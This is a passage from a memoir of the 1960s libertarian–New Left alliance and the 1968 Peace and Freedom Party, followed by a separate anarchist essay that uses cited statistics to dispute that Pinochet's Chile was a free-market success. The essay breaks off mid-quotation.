Danny Rosenthal was converted to an isolationist position by Liggio 's article in the first issue ; Wilson A. Clark , Jr. , head of the Conservative Club of the University of North Carolina , abandoned conservatism for our position ; and the entire YAF unit at the University of Kansas ( the " second generation " of libertarians there ) , headed by Becky Glaser , left YAF to form an SDS chapter on that campus .
And Ronald Hamowy , by then a professor of history at Stanford , expounded our new " Left - Right " position in the New Republic , recalling the free market , civil libertarian , isolationist and anti-imperialist position of Old Rightists Spencer , Bastiat , Sumner , and Nock , contrasting them to the New Right and the current partnership of government and big business , and lauding Paul Goodman and other aspects of libertarianism on the New Left .
We were also interested in the new experiments which some of the New Left were conducting in alternative and " parallel institutions " in education , in particular the " Free University " movement which for a short while held promise as establishing " communities of scholars " free from the bureaucratic and Establishment trappings of the American educational system .
Through Left and Right and through Leonard Liggio 's teaching courses at the Free University of New York on imperialism , we had the opportunity of meeting the bright young William Appleman Williams students in the New York area , in particular Jim Weinstein , Ronald Radosh , and Marty Sklar .
This also launched Liggio 's role for several years as a leading New Left scholar - activist , as Leonard 's expertise in the history of foreign policy and of Vietnam led him to play a considerable part in the Vietnam Teach - In movement , in editing Leviathan , and Viet - Report , in becoming managing editor of the Guardian ( from which he was purged for " taking the capitalist road " in trying to cut costs ) , and eventually in becoming head of the American branch of the Bertrand Russell Peace Foundation and aiding its great work in the War Crimes Tribunal .
In those days , too , SDS , while totally opposed morally to the war in Vietnam , was not yet anti-imperialist ; and Leonard played a major role in advising the May 2nd Movement , which pioneered on the New Left in advancing an anti-American - imperialist perspective , one which SDS soon came to adopt .
He also led in opposing what turned out to be the domination of M - 2 - M by the Maoist Progressive Labor Movement , a domination which soon brought about the dissolution of the organization .
Meanwhile , Left and Right continued to present our " left - right " perspective , concentrating on foreign policy and militarism but also covering other libertarian areas , and presenting a left - right spectrum of authors : libertarians ( the editors , philosophy professor " Eric Dalton , " Larry Moss , reprints of Lysander Spooner and Herbert Spencer ) , Old Rightists and isolationists ( Harry Elmer Barnes , Garet Garrett , William L. Neumann ) , leftists ( Marvin Gettleman , Ronald Radosh , Janet McCloud , Russell Stetler , and Conrad Lynn ) , and free - market conservatives ( Yale Brozen , Gordon Tullock ) .
In particular , I hailed the decisive turn during 1966 of SDS toward an anti-imperialist and militantly antidraft position , and the final repudiation of its social democratic Old Guard .
During 1966 and 1967 , the libertarian elements of SDS grew in influence ; there was a growth of the " Texas anarchists " in the organization , and a proliferation of buttons proclaiming " I Hate the State . "
The high point of SDS and New Left interest in the " left - right " libertarian position came in the work of former SDS President Carl Oglesby .
In 1967 , Oglesby published Containment and Change , a critique of the Vietnam War and the American Empire .
In his concluding pages on strategy , Oglesby called for an alliance with the Old Right .
He called upon the libertarian , laissez - faire wing of the Right to abandon the conservative movement which held the libertarians in thrall by convincing them of the existence of a " foreign threat . "
Oglesby cited my article in Continuum , and quoted from the Old Right view on war and peace of General MacArthur , Buffett , Garrett , Chodorov , and Dean Russell .
In particular , Oglesby cited Garrett at length , stating that his " analysis of the totalitarian impulse of imperialism " had been verified repeatedly over the intervening years .
Oglesby concluded that libertarian right - wing thought , along with the Black Power movement and the anti-imperialist student movement , were all " rootedly American " and were
of the grain of American humanist individualism and voluntaristic associational action ; and it is only through them that the libertarian tradition is activated and kept alive .
In a strong sense , the Old Right and the New Left are morally and politically coordinate .
But Oglesby prophetically warned that both the libertarian Right and the New Left could miss out on this alliance and conjunction , for the former could remain in thrall to the militarism and imperialism of the right wing , while the latter could revert to a form of Stalinism .
The peak of my political activity on the New Left came during the 1968 campaign .
In the spring of 1968 , my old enthusiasm for third - party politics was rekindled , albeit in a different direction .
The Peace and Freedom Party ( PFP ) which had become ( and still is ) established in California , decided to go national , and opened up shop in New York .
I found that the preliminary platform and the only requirement for membership contained only two planks : the first was immediate US withdrawal from Vietnam , and the second was some plank so vague about being nice to everyone that almost anyone , left , right , center could have endorsed it .
Great : here was a coalition party dedicated only to immediate withdrawal from Vietnam and requiring no commitment whatever to statism !
As a result , our entire libertarian group in New York poured happily into the new party .
The PFP was structured around clubs , most of them regional — such as the powerful West Side ( of Manhattan ) club , the hippie Greenwich Village Club , etc .
One was occupational — a Faculty Club .
Since there were very few actual faculty members in this very youthful party , the PFP generously widened the definition of " faculty " to include graduate students .
Lo and behold !
On that basis , of approximately 24 members in the Faculty Club , almost exactly one - half were our people : libertarians , including myself , Leonard Liggio , Joe Peden , Walter Block and his wife , Sherryl , and Larry Moss .
The legislative arm of the PFP was to be the Delegate Assembly , consisting of delegates from the various clubs .
The Faculty Club was entitled to two delegates , and so we naturally divvied it up : one going to the socialists , and one to us , who turned out to be me .
At the first meeting of the Delegate Assembly , then , here I was , only in the party for about a week , but suddenly vaulted to top rank in the power elite .
Then , early in the meeting , some people got up and advocated abolishing the Delegate Assembly as somehow " undemocratic . "
Jeez !
I was just about to get a taste of juicy political power , when some SOBs were trying to take it away from me !
As I listened further , I realized that something even more sinister and of broader concern was taking place .
Apparently , the New York party was being run by a self - perpetuating oligarchical executive committee , who , in the name of " democracy , " were trying to eliminate all intermediate social institutions , and to operate upon the party mass unimpeded , all in the name of " democracy . "
To me it smacked of rotten Jacobinism , and I got up and delivered an impassioned speech to that effect .
After the session ended , a few people came up to me and said that some like - minded thinkers , who constituted the West Side Club , were having a gathering to discuss these matters .
So began our nefarious alliance with the Progressive Labor faction within Peace and Freedom .
It later turned out that the PFP and its executive committee were being run , both in California and in New York , by the Leninist - Trotskyite Draperites , international socialists run by Berkeley librarian Hal Draper .
The Draperites were the original Schachtmanites , Trotskyites who had rebelled against Trotsky as Third Camp opponents of both the United States and the Soviet Union .
The New York party was being run by the Draperites , including as their allies a motley collection of assorted socialists , pacifists , countercultural druggies , and left - libertarians .
The opposition within PFP was indeed being run by the Maoist Progressive Labor Party ( PL ) , who the Draperites feared were plotting a takeover .
Actually , it soon became clear that PL had no such intention , but were only keeping their hand in , and were using the West Side Club to recruit candidate - members into PL .
Both PL and the Draperites were keeping the structure loose while waiting for an expected flood of Gene McCarthy followers after Humphrey 's expected Democratic nomination victory — a flood that , of course , never materialized .
Hence the loose ideological requirement , and the fact that the platform was up for grabs .
The alliance between PL and us libertarians was highly useful to both sides , in addition to cooperating in fending off Draperite dictatorship in the name of democracy .
What PL got out of it was a cover for their recruiting , since no one could of course call us vehement antisocialists tools of Progressive Labor .
What we got out of it was PL 's firm support for an ideological platform — adopted by our joint caucus — that was probably the most libertarian of any party since the days of Cleveland Democracy .
The PL people were pleasantly " straight " and nondruggie , although quite robotic , resembling left - wing Randians .
The great exception was the delightful Jake Rosen , the absolute head of PL 's fraction in the PFP .
Rosen — bright , joyous , witty , and decidedly nonrobotic — knew the score .
One of my fondest memories of life in the PFP was of Jake Rosen trying to justify our laissez - faire platform to his Maoist dunderheads :
" Hey , Jake , what does this mean : absolute freedom of trade and opposition to all government restrictions ? "
" Er , that 's the ' antimonopoly coalition ' . "
" Oh , yeah . "
Jake , with more sincerity , joined us in opposing guaranteed annual income plans ; he considered them bourgeois and " reactionary . "
About the only thing Jake balked at was our proposal that our caucus come out for immediate abolition of rent control .
" Hey , fellas , look , I 'd love to do it , but we have commitments to tenant groups . "
Graciously , we let him off the hook .
With his personality , I did n't think Jake would last in PL .
In addition he had already implicitly rebelled against party discipline .
An obviously bright guy , Jake had accepted PL 's orders to be " working class " and became a construction worker ; but he stubbornly failed to obey orders and move from the hip , cosmopolitan West Side of Manhattan to Queens .
( " Jake , no construction worker lives on the West Side . " )
Indeed , a year or so after the breakup of the PFP , Jake left or was expelled from PL , and immediately went upwardly mobile , moving to Chicago and becoming a successful commodity broker .
As the McCarthy people failed to come in , conflicts within the party became ever greater , and the New York PFP began having almost weekly conventions .
In addition to the PL Draperite conflict , the Communist Party set up its competing front in New York , the " Freedom and Peace Party " ( FPP ) , the existence of which began to confuse everyone , including the Left .
Trying to put down the schisms , the California Draperites sent to run the New York party the supposedly legendary organizer Comrade Carlos , a Chicano whom the Draperite wing found to be charismatic , and to whom the rest of us took a strong dislike .
Although the PFP was clearly fizzling , the time finally came in late summer for nominations .
The Draperites had decided on the ex-rapist Eldridge Cleaver for president , then head of the Black Panther Party .
Cleaver displayed his contempt for the PFP by not showing up , and sending Black Panther sidekick Bobby Seale to sneer openly at his honkie admirers , who masochistically welcomed every sign of Panther derision .
No one opposed Cleaver for the nomination ; and since the PL bloc abstained , and since my libertarian colleagues did not make the early morning hour , it turned out that mine was the only vote cast against Eldridge Cleaver for president — not a bad legacy of my time on the New Left .
For the US Senate nomination , the veteran socialist - pacifist David McReynolds was the Draperite candidate , and I was persuaded to run against him to represent the PL - libertarian opposition .
I agreed to run only because I knew darn well that there was no chance at all to defeat McReynolds .
I did not envy McReynolds 's day in the sun .
The Freedom and Peace Party was running a black candidate for Senate , and the Black Panthers did not wish to oppose a fellow Afro-American with the white McReynolds .
The Black Panthers apparently pulled a gun on McReynolds , ordering him to withdraw his candidacy .
What happened after that is hazy ; I do n't believe that McReynolds withdrew , but on the other hand I do n't believe that either of these people made it to the ballot — and the 1968 election turned out to be the end of the PFP ( except in California ) and the FPP .
And , oh yes , I heard later that Comrade Carlos had turned out to be a police agent .
A coda : years later , I happened to run into McReynolds , at a meeting trying vainly to bring some people into libertarianism .
He kept telling me mournfully : " You gave us a lot of trouble in ' 68 .
A lot of trouble . "
I was trying to be polite at this little gathering , so I did n't tell him how delighted I was at his tribute .
By the end of the 1960s , the New Left had unfortunately vindicated Carl Oglesby 's warning , and had abandoned its high libertarian promise of the mid-'60s .
Unstable and lacking a coherent ideology , SDS , in response to the Leninism and Stalinism of its Progressive Labor faction , itself reverted to these Old Left creeds , albeit in a still more radical and hopped - up form .
Increasingly lured by the " counterculture " and by anti-intellectualism generally , the New Left increasingly ignored scholarship in favor of unthinking " action , " and the Free Universities faded away into scattered centers of avant - garde eurythmics and instruction in radio repair .
And educational reform increasingly turned into an attempt to destroy all intellectual and educational standards , and to replace content in courses by rap sessions about the students ' " feelings . "
Finally , shorn of scholarship , of intellectuality , and of strategic perspective , the remnants of the New Left were to burn themselves out and disappear after the breakup of SDS in 1969 into an orgy of senseless and indiscriminate violence .
Despairing of the entire American population as hopelessly bourgeois , the SDS remnants had disastrously concluded that all America — working class , middle class , or whatever — was The Enemy and had to be destroyed .
By 1970 the New Left was effectively dead , and put out of its misery by Mr. Nixon 's masterstroke of repealing the draft that year .
Deprived of worry about being drafted , the student idealists effectively ended their protest — though the war in Vietnam was to continue for several years .
Looking back over the experiment of alliance with the New Left , it also became clear that the result had in many cases been disastrous for libertarians ; for , isolated and scattered as these young libertarians were , the Clarks and the Milchmans and some of the Glaser - Kansas group were soon to become leftists in fact , and in particular to abandon the very devotion to individualism , private property rights , and the free - market economy that had brought them to libertarianism , and then to the New Left alliance , in the first place .
We came to realize that , as Marxian groups had discovered in the past , a cadre with no organization and with no continuing program of " internal education " and reinforcement is bound to defect and melt away in the course of working with far stronger allies .
The libertarian groupings would have to be rebuilt as a self - conscious movement , and its major emphasis would have to be on nourishing , maintaining , and extending the libertarian cadre itself .
Only operating from such a cadre could we make strong and fruitful alliances with no danger to the libertarian movement itself .
In the meanwhile , the Buckleyite right wing was progressively abandoning even its rhetorical devotion to libertarian ideals .
For National Review and its associates had learned what they believed to be the lesson of the Goldwater rout ; from that point on , the conservative movement would shed itself of any and all " extremist " elements , whether in domestic or foreign affairs , and move in a " responsible " and " respectable " manner toward the seats of power for which it had yearned for so many years .
As the pope — as well as the insult comic — of the movement , Bill Buckley presided over the excommunicating and purging from conservatism of any and all elements that might prove embarrassing in its quest for respectability and power : libertarians , Birchers , atheists , ultra-Catholics , Randians , anyone who might disturb conservatism in its cozy sharing of political rule .
Hence by 1968 , with the exception of Frank Meyer , who still adhered to Ronald Reagan , all conservative doubts about the greatness and wisdom of Richard Milhous Nixon had been effectively stilled ; and Bill Buckley was suitably rewarded by the Nixon administration with a post as member of the Advisory Commission of the US Information Agency ( USIA ) , our Ministry of Propaganda overseas .
Buckley induced Frank Shakespeare , the conservative head of USIA , to hire National Review editor James Burnham to compile a list of deserving books to be placed in USIA libraries in foreign countries .
Prominent on Burnham 's list were — surprise !
surprise ! — the works of both Burnham and Buckley who , wrote Burnham , is " one of the best - known writers of his generation . "
In a perceptive review of one of Buckley 's later books , left - liberal Margot Hentoff noted and lamented the drift of conservatism into joining the Establishment , the very Establishment which even National Review , in its early years , used to attack .
As Mrs. Hentoff stated :
What happened to Mr. Buckley , along with the rest of us , was the breaking down of traditional ideological compartments , the blurring of traditional alliances and enmities .
Not only did the old New Deal and New Frontier politics lose credence with the left , but the left then walked off with the conservative banners of nonintervention , freedom from governmental coercion , rugged individualism , decentralization , and , in some cases , racial separatism … .
It appears that Mr. Buckley is beginning to take on the weight of middle - aged responsibility , sounding more often like a resilient prince of the Church than like a purifying spirit .
Mrs. Hentoff concluded that Buckley had been moving " toward a rather awful kind of moderation … .
He is now more aware of consequence , as he moves away from the absence of power , that condition which was his abiding charm . "
Thus , apart from its abiding thirst for war , the existing ( 1971 ) right wing is scarcely distinguishable from old - style , conservative liberalism .
( And even on war the difference is really one of degree . )
Apart from style , there is very little to distinguish , say , Bill Buckley from Sidney Hook , or Senator Tower from former Senator Dodd , despite the latter 's more New Dealish voting record .
On hawkish foreign policy , on aggrandizing militarism and the military - industrial complex , on crushing civil liberties and granting unchecked powers to the police , on aggrandizing executive power and privilege — in short , on the major problems of our time , the conservatives and liberals are in broad agreement .
And even their seeming disagreement on free - market versus liberal economics has virtually disappeared in the implicit acceptance by both conservatives and liberals of the New Deal - Great Society Corporate State neo-Mercantilist Consensus .
With his adoption of the Milton Friedman - Robert Theobald guaranteed income proposal , with his fight to bail out the SST ( supersonic transport ) program and Lockheed , with his nationalization of the passenger - car industry to the hosannas of conservatives , liberals and the industry itself , Richard Nixon has completed the process of integrating the right wing into the post–New Deal consensus .
As the Marxist historian Eugene D. Genovese has perceptively put it : " President Nixon 's right - wing liberalism is the counterpart of the Communist Party 's left - wing liberalism — that is , each advances solutions within the established consensus of liberal social policy . "
Eugene D. Genovese , " The Fortunes of the Left , " National Review 22 , no .
47 ( December 1 , 1970 ) : 1269 .
And so we now face an America ruled alternately by scarcely differentiated conservative and liberal wings of the same state - corporatist system .
Within the ranks of liberalism there is a growing number of disaffected people who are increasingly facing the fact that their own credo , liberalism , has been in power for forty years , and what has it wrought ?
Executive dictation , unending war in Vietnam , imperialism abroad and militarism and conscription at home , intimate partnership between Big Business and Leviathan Government .
An increasing number of liberals are facing this critical failure and are recognizing that liberalism itself is to blame .
They are beginning to see that Lyndon Johnson was absolutely correct in habitually referring to Franklin Roosevelt as his " Big Daddy . "
The paternity is clear , and the whole crew stands or falls together .
Where , then , can disaffected liberals turn ?
Not to the current Right , which offers them only more of the same , spiced with a more jingoistic and theocratic flavor .
Not to the New Left , which destroyed itself in despair and random violence .
Libertarianism , to many liberals , offers itself as the place to turn .
And so libertarianism itself grows apace , fueled by split - offs from conservatism and liberalism alike .
Just as conservatives and liberals have effectively blended into a consensus to uphold the Establishment , so what America needs now — and can have — is a countercoalition in opposition to the Welfare - Warfare State , a coalition that would favor the short - term libertarian goals of militant opposition to the Vietnam War and the Cold War generally , and to conscription , the military - industrial complex , and the high taxes and accelerated inflation that the state has needed to finance these statist measures .
It would be a coalition to advance the cause of both civil liberty and economic freedom from government dictation .
It would be , in many ways , a renaissance of a coalition between the best of the Old Right and the old New Left , a return to the glorious days when elements of Left and Right stood shoulder to shoulder to oppose the conquest of the Philippines and America 's entry into World Wars I and II .
Here would be a coalition that could appeal to all groups throughout America , to the middle class , workers , students , liberals , and conservatives alike .
But Middle America , for the sake of gaining freedom from high taxes , inflation , and monopoly , would have to accept the idea of personal liberty and a loss of national face abroad .
And liberals and leftists , for the sake of dismantling the war machine and the American Empire , would have to give up the cherished Old Left - liberal dream of high taxes and federal expenditures for every goody on the face of the earth .
The difficulties are great , but the signs are excellent that such an anti-Establishment and antistatist coalition can and might come into being .
Big government and corporate liberalism are showing themselves to be increasingly incapable of coping with the problems that they have brought into being .
And so objective reality is on our side .
But more than that : the passion for justice and moral principle that is infusing more and more people can only move them in the same direction ; morality and practical utility are fusing ever more clearly to greater numbers of people in one great call : for the liberty of people — of individuals and voluntary groups — to work out their own destiny , to take control over their own lives .
We have it in our power to reclaim the American Dream .
Chile , capitalism and liberty for the rich by Iain MacSaorsa
* Does n't Chile prove that the free market benefits everyone ?
This is a common right - wing " Libertarian " argument , one which is supported by many other supporters of " free market " capitalism .
Milton Friedman , for example , stated that Pinochet " has supported a fully free - market economy as a matter of principle .
Chile is an economic miracle " [ Newsweek , Jan , 1982 ] .
Pinochet was the figure - head of a military coup in 1973 against the democratically elected left - wing government , a coup which the CIA helped organise .
Thousands of people were murdered by the forces of " law and order " during the coup and Pinochet 's forces " are conservatively estimated to have killed over 11 000 people in his first year in power . "
[ P. Gunson , A. Thompson , G. Chamberlain , The Dictionary of Contemporary Politics of South America , Routledge , 1989 , p. 228 ]
The installed police state 's record on human rights was denounced as barbaric across the world .
However , we will ignore the obvious contradiction in this " economic miracle " , i.e. why it almost always takes authoritarian / fascistic states to introduce " economic liberty , " and concentrate on the economic facts of the free - market capitalism imposed on the Chilean people .
Working on a belief in the efficiency and fairness of the free market , Pinochet desired to put the laws of supply and demand back to work , and set out to reduce the role of the state and also cut back inflation .
He , and " the Chicago Boys " -- a group of free - market economists -- thought what had restricted Chile 's growth was government intervention in the economy -- which reduced competition , artificially increased wages , and led to inflation .
The ultimate goal , Pinochet once said , was to make Chile " a nation of entrepreneurs . "
The role of the Chicago Boys can not be understated .
They had a close relationship with the military from 1972 , and according to one expert had a key role in the coup :
" In August of 1972 a group of ten economists under the leadership of de Castro began to work on the formulation of an economic programme that would replace [ Allende 's one ] .
. .
In fact , the existence of the plan was essential to any attempt on the part of the armed forces to overthrow Allende as the Chilean armed forced did not have any economic plan of their own . "
[ Silvia Bortzutzky , " The Chicago Boys , social security and welfare in Chile " , The Radical Right and the Welfare State , Howard Glennerster and James Midgley ( eds. ) , p. 88 ]
It is also interesting to note that " [ a ] ccording to the report of the United States Senate on covert actions in Chile , the activities of these economists were financed by the Central Intelligence Agency ( CIA ) " [ Bortzutzky , Op. Cit. , p. 89 ]
Obviously some forms of state intervention were more acceptable than others .
The actual results of the free market policies introduced by the dictatorship were far less than the " miracle " claimed by Friedman and a host of other " Libertarians . "
The initial effects of introducing free market policies in 1975 was a shock - induced depression which resulted in national output falling buy 15 percent , wages sliding to one - third below their 1970 level and unemployment rising to 20 percent .
[ Elton Rayack , Not so Free to Choose , p. 57 ]
This meant that , in per capita terms , Chile 's GDP only increased by 1.5 % per year between 1974 - 80 .
This was considerably less than the 2.3 % achieved in the 1960's .
The average growth in GDP was 1.5 % per year between 1974 and 1982 , which was lower than the average Latin American growth rate of 4.3 % and lower than the 4.5 % of Chile in the 1960's .
Between 1970 and 1980 , per capita GDP grew by only 8 % , while for Latin America as a whole , it increased by 40 % .
Between the years 1980 and 1982 during which all of Latin America was adversely affected by depression conditions , per capita GDP fell by 12.9 percent , compared to a fall of 4.3 percent for Latin America as a whole .
[ Elton Rayack , Op. Cit. , p. 64 ]
In 1982 , after 7 years of free market capitalism , Chile faced yet another economic crisis which , in terms of unemployment and falling GDP was even greater than that experienced during the terrible shock treatment of 1975 .
Real wages dropped sharply , falling in 1983 to 14 percent below what they had been in 1970 .
Bankruptcies skyrocketed , as did foreign debt .
[ Elton Rayack , Op. Cit. , p. 69 ]
By the end of 1986 Gross Domestic Product per capita barely equaled that of 1970 [ Thomas Skidmore and Peter Smith , " The Pinochet Regime " , pp. 137-138 , Modern Latin America , Second Edition , Oxford University Press , 1989 ] .
The Pinochet regime did reduce inflation , from around 500 % at the time of the CIA - backed coup , to 10 % by 1982 .
From 1983 to 87 , it fluctuated between 20 and 31 % .
The advent of the " free market " led to reduced barriers to imports " on the ground the quotas and tariffs protected inefficient industries and kept prices artificially high .
The result was that many local firms lost out to multinational corporations .
The Chilean business community , which strongly supported the coup in 1973 , was badly affected . "
[ Skidmore and Smith , Op. Cit . ]
However , by far the hardest group hit was the working class , particularly the urban working class .
By 1976 , the third year of Junta rule , real wages had fallen to 35 % below their 1970 level .
It was only by 1981 that they has risen to 97.3 % of the 1970 level , only to fall again to 86.7 % by 1983 .
Unemployment , excluding those on state make - work programmes , was 14.8 % in 1976 , falling to 11.8 % by 1980 ( this is still double the average 1960 's level ) only to rise to 20.3 % by 1982 .
[ Rayack , Op. Cit. , p. 65 ] .
Unemployment ( including those on government make - work programmes ) had risen to a third of the labour force by mid-1983 .
By 1986 , per capita consumption was actually 11 % lower than the 1970 level .
[ Skidmore and Smith , Op. Cit. ]
Between 1980 and 1988 , the real value of wages grew only 1.2 percent while the real value of the minimum wage declined by 28.5 percent .
During this period , urban unemployment averaged 15.3 percent per year .
[ Silvia Bortzutzky , Op. Cit. , p. 96 ]
In other words , after nearly 15 years of free market capitalism , real wages had still not exceeded their 1970 levels .
The decline of domestic industry had cost thousands of better - paying jobs .
The ready police repression made strikes and other forms of protest both impractical and dangerous .
According to a report by the Roman Catholic Church 113 protesters had been killed during social protest against the economic crisis of the early 1980s , with several thousand detained for political activity and protests between May 1983 and mid-1984 .
Thousands of strikers were also fired and union leaders jailed .
[ Rayack , Op. Cit. , p. 70 ]
The law was also changed to reflect the power property owners have over their wage slaves and the " total overhaul of the labour law system [ which ] took place between 1979 and 1981 .
. . aimed at creating a perfect labour market , eliminating collective bargaining , allowing massive dismissal of workers , increasing the daily working hours up to twelve hours and eliminating the labour courts . "
[ Silvia Borzutzky , Op. Cit. , p. 91 ]
Little wonder , then , that this favourable climate for business operations resulted in generous lending by international finance institutions .
One consequence of Pinochet 's neo-classical monetarist policies " was a contraction of demand , since workers and their families could afford to purchase fewer goods .
The reduction in the market further threatened the business community , which started producing more goods for export and less for local consumption .
This posed yet another obstacle to economic growth and led to increased concentration of income and wealth in the hands of a small elite . "
[ Skidmore and Smith , Op. Cit . ]
It is the increased wealth of the elite that we see the true " miracle " of Chile .
According to one expert in the Latin American neo-liberal revolutions , the elite " had become massively wealthy under Pinochet " and when the leader of the Christian Democratic Party returned from exile in 1989 he said that economic growth that benefited the top 10 per cent of the population had been achieved ( Pinochet 's official institutions agreed ) .
[ Duncan Green , The Silent Revolution , p. 216 , Noam Chomsky , Deterring Democracy , p. 231 ]
Thus the wealth created by the relatively high economic growth Chile experienced in the mid to late 1980s did not " trickle down " to the working class ( as claimed would happen by " free market " capitalist dogma ) but instead accumulated in the hands of the rich .
For example , in the last years of Pinochet 's dictatorship , the richest 10 percent of the rural population saw their income rise by 90 per cent between 1987 and 1990 .
The share of the poorest 25 per cent fell from 11 per cent to 7 per cent .
[ Duncan Green , Op. Cit. , p. 108 ]
The legacy of Pinochet 's social inequality could still be found in 1993 , with a two - tier health care system within which infant mortality is 7 per 1000 births for the richest fifth of the population and 40 per 1000 for the poorest 20 per cent .
[ Ibid. , p. 101 ]
Per capita consumption fell by 23 % from 1972 - 87 .
The proportion of the population below the poverty line ( the minimum income required for basic food and housing ) increased from 20 % to 44.4 % from 1970 to 1987 .
Per capita health care spending was more than halved from 1973 to 1985 , setting off explosive growth in poverty - related diseases such as typhoid , diabetes and viral hepatitis .
On the other hand , while consumption for the poorest 20 % of the population of Santiago dropped by 30 % , it rose by 15 % for the richest 20 % .
[ Noam Chomsky , Year 501 , pp. 190-191 ]
The impact on individuals extended beyond purely financial considerations , with the Chilean labour force " once accustomed to secure , unionised jobs [ before Pinochet ] . . . [ being turned ] into a nation of anxious individualists . . . [ with ] over half of all visits to Chile 's public health system involv[ing ] psychological ailments , mainly depression .
' The repression is n't physical any more , it 's economic - feeding your family , educating your child , ' says Maria Pena , who works in a fishmeal factory in Concepcion .
' I feel real anxiety about the future ' , she adds , ' They can chuck us out at any time .
You can't think five years ahead .
If you 've got money you can get an education and health care ; money is everything here now . ' "
[ Duncan Green , Op. Cit. , p. 96 ]
Little wonder , then , that " adjustment has created an atomised society , where increased stress and individualism have damaged its traditionally strong and caring community life .
. . suicides have increased threefold between 1970 and 1991 and the number of alcoholics has quadrupled in the last 30 years . . . [ and ] family breakdowns are increasing , while opinion polls show the current crime wave to be the most widely condemned aspect of life in the new Chile .
' Relationships are changing , ' says Betty Bizamar , a 26 - year - old trade union leader .
' People use each other , spend less time with their family .
All they talk about is money , things .
True friendship is difficult now . ' "
[ Ibid. , p. 166 ]
The experiment with free market capitalism also had serious impacts for Chile 's environment .
The capital city of Santiago became one of " the most polluted cities in the world " due the free reign of market forces .
[ Nathanial Nash , cited by Noam Chomsky , Year 501 , p. 190 ]
With no environmental regulation there is general environmental ruin and water supplies have severe pollution problems .
[ Noam Chomsky , Ibid . ]
Since Chile has become a democracy ( with the armed forces still holding considerable influence ) some movement towards economic reforms have begun and been very successful .
Increased social spending on health , education and poverty relief has lifted over a million Chileans out of poverty between 1987 and 1992 .
In even the neo-liberal tiger has had to move away from free market policies and the Chilean government has had to intervene into the economy in order to start putting back together the society ripped apart by market forces and authoritarian government .
So , for all but the tiny elite at the top , the Pinochet regime of " economic liberty " was a nightmare .
Economic " liberty " only seemed to benefit one group in society , an obvious " miracle . "
For the vast majority , the " miracle " of economic " liberty " resulted , as it usually does , in increased poverty , pollution , crime and social alienation .
The irony is that many right - wing " libertarians " point to it as a model of the benefits of the free market .
* But did n't Pinochet 's Chile prove that " economic freedom is an indispensable means toward the achievement of political freedom " ?
Pinochet did introduce free - market capitalism , but this meant real liberty only for the rich .
For the working class , " economic liberty " did not exist , as they did not manage their own work nor control their workplaces and lived under a fascist state .
As far as political liberty goes , it was only re-introduced once it was certain that it could not be used by ordinary people .
As Cathy Scheider notes , " economic liberty " has resulted in most Chileans having " little contact with other workers or with their neighbours , and only limited time with their family .
Their exposure to political or labour organisations is minimal .
. . they lack either the political resources or the disposition to confront the state .
The fragmentation of opposition communities has accomplished what brute military repression could not .
It has transformed Chile , both culturally and politically , from a country of active participatory grassroots communities , to a land of disconnected , apolitical individuals .
The cumulative impact of this change is such that we are unlikely to see any concerted challenge to the current ideology in the near future " [ Report on the Americas ( NACLA ) XXVI , 4/4/93 ] .
In such circumstances , political liberty can be re-introduced , as no one is in a position to effectively use it .
In addition , Chileans live with the memory that challenging the state in the near past resulted in a fascist dictatorship murdering thousands ( if not tens of thousands ) of people as well as repeated and persistent violations of human rights by the junta , not to mention the existence of " anti-Marxist " death squads -- for example in 1986 " Amnesty International accused the Chilean government of employing death squads . "
[ P. Gunson , A. Thompson , G. Chamberlain , The Dictionary of Contemporary Politics of South America , Routledge , 1989 , p. 86 ]
These facts that would have a strongly deterrent effect on people contemplating the use of political liberty to actually change the status quo in ways that the military and economic elites did not approve of .
In addition , it would make free speech , striking and other forms of social action almost impossible , thus protecting and increasing the power , wealth and authority of the employer over their wage slaves .
As Kropotkin pointed out years ago , " freedom of press ... and all the rest , are only respected if the people do not make use of them against the privileged classes .
But the day the people begin to take advantage of them to undermine those privileges , then the so - called liberties will be cast overboard . "
[ Words of a Rebel , p. 42 ]
Chile is a classic example of this .
Moreover , it is interesting to note that the leading expert of the Chilean " economic miracle " ( to use Milton Friedman 's words ) did not consider that political liberty could lead to " economic liberty " ( i.e. free market capitalism ) .
According to Sergio de Castro , the architect of the economic programme Pinochet imposed , fascism was required to introduce " economic liberty " because :
" it provided a lasting regime ; it gave the authorities a degree of efficiency that it was not possible to obtain in a democratic regime ; and it made possible the application of a model developed by experts and that did not depend upon the social reactions produced by its implementation . " [ quoted by Silvia Bortzutzky , " The Chicago Boys , social security and welfare in Chile " , The Radical Right and the Welfare State , Howard Glennerster and James Midgley ( eds. ) , p. 90 ]
In other words , fascism was an ideal political environment to introduce " economic liberty " because it had destroyed political liberty .
Perhaps we should conclude that the denial of political liberty is both necessary and sufficient in order to create ( and preserve ) " free market " capitalism ?
And perhaps to create a police state in order to control industrial disputes , social protest , unions , political associations , and so on , is no more than to introduce the minimum force necessary to ensure that the ground rules the capitalist market requires for its operation are observed ?
As Brian Barry argues in relation to the Thatcher regime in Britain which was also heavily influenced by the ideas of " free market " capitalists like Milton Friedman and Hayek , perhaps it is :
" Some observers claim to have found something paradoxical in the fact that the Thatcher regime combines liberal individualist rhetoric with authoritarian action .
But there is no paradox at all .
Even under the most repressive conditions . . . people seek to act collectively in order to improve things for themselves , and it requires an enormous exercise of brutal power to fragment these efforts at organisation and to force people to pursue their interests individually .
. . left to themselves , people will inevitably tend to pursue their interests through collective action - in trade unions , tenants ' associations , community organisations and local government .
Only the pretty ruthless exercise of central power can defeat these tendencies : hence the common association between individualism and authoritarianism , well exemplified in the fact that the countries held up as models by the free - marketers are , without exception , authoritarian regimes . "
[ " The Continuing Relevance of Socialism " , in Thatcherism , edited Robert Skidelsky , p. 146 ]
Little wonder , then , that Pinochet 's regime was marked by authoritarianism , terror and rule by savants .
Indeed , " [t ] he Chicago - trained economists emphasised the scientific nature of their programme and the need to replace politics by economics and the politicians by economists .
Thus , the decisions made were not the result of the will of the authority , but they were determined by their scientific knowledge .
The use of the scientific knowledge , in turn , would reduce the power of government since decisions will be made by technocrats and by the individuals in the private sector . "
[ Silvia Borzutzky , Op. Cit. , p. 90 ]
Of course , turning authority over to technocrats and private power does not change its nature - only who has it .
Pinochet 's regime saw a marked shift of governmental power away from protection of individual rights to a protection of capital and property rather than an abolition of that power altogether .
As would be expected .
only the wealthy benefited .
The working class were subjected to attempts to create a " perfect labour market " - and only terror can turn people into the atomised commodities such a market requires .
Perhaps when looking over the nightmare of Pinochet 's regime we should ponder these words of Bakunin in which he indicates the negative effects of running society by means of science books and " experts " :
" human science is always and necessarily imperfect .
